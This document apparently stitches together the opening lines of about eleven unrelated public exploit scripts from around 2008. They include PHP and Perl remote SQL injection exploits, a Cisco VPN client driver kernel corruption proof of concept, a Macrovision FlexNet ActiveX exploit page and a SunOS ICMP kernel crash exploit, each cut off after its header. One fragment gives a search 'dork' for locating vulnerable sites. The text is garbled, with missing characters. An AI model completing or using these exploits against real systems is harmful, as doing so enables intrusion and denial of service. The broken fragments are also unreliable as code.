#!/usr/bin/php -q -d short_open_tag=on ?php // magic_quotes_gpc needs to be off error_reporting(0); ini_set(max_execution_time,0); ini_set(default_socket_timeout,5); if ($argc5) { print ----------------------------------------------------------------
#!/usr/bin/php -q -d short_open_tag=on ?php // magic_quotes_gpc needs to be off error_reporting(0); ini_set(max_execution_time,0); ini_set(default_socket_timeout,5); if ($argc3) { print ----------------------------------------------------------------
#!/usr/bin/php -q -d short_open_tag=on ?php // magic_quotes_gpc needs to be off error_reporting(0); ini_set(max_execution_time,0); ini_set(default_socket_timeout,5); if ($argc3) { print ----------------------------------------------------------------
/* cpndrv-dos.c * * Copyright (c) 2008 by mu-b@digit-labs.org * * Cisco Systems VPN Client IPSec Driver local kernel system pool corruption POC * by mu-b - Sat 11 Jan 2008 * * - Tested on: CVPNDRVA.sys 5.0.02.0090 * * specifying an input buffer size
!-- Macrovision FlexNet DownloadManager Insecure Methods Exploit Implemented Categories: Category: Safe for Scripting Written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.61372 -- html head titleMacrovision F
#!/usr/bin/perl ####################################################### # # Xforum 1.4 Remote SQL Injection # desc: Un forum php/MySQL, avec gestion complete des membres et des messages # download: http://www.comscripts.com/scripts/php.xforum.1188.ht
/* Copyright 2008 Luigi Auriemma This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your opt
#!/usr/bin/perl #Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit #Bug Found by ka0x ( http://milw0rm.org/exploits/4901 ).. but sql injection works if we include in index.php bug file with sql injection..like this : #http://192.168.
#!/usr/bin/perl #Script : PhotoKron All Version #All Version #Author : Pr0metheuS #Gr33tz to Gr33tz-Team #Gr33tz-Team.ORG #Dork : Powered by photokorn ### INFO ## # Works IF /update/ is on server...60% site are vulnerable.... ## INFO ## use LWP::User
#!/usr/bin/php -q -d short_open_tag=on ? echo ' Evilsentinel = 1.0.9 Disable Exploit by BlackHawk hawkgotyou@gmail.com http://itablackhawk.altervista.org Thanks to rgod for the php code and Marty for the Love '; if ($argc3) { echo Usage: php .$argv[0
/* SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope Null Pointer Dereference in Kernel Space Seems to work only if attacked in the same network segment, maybe because of firewalls/routers in place. This seems to be the issue described in bid 2232